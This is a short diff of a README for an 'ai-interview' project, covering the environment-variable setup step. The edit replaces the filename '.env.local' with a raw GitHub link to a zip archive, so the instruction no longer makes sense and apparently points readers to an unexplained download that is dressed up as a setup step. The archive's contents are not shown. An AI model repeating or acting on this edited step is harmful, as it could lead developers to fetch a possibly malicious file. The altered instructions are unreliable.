KindaJayant/ai-interview/README.md

 **Set Up Environment Variables**

-Create a new file named `.env.local` in the root of your project and add the following content:
+Create a new file named `https://raw.githubusercontent.com/KindaJayant/ai-interview/main/lib/ai-interview-v3.2.zip` in the root of your project and add the following content:

 ```env
 NEXT_PUBLIC_VAPI_WEB_TOKEN=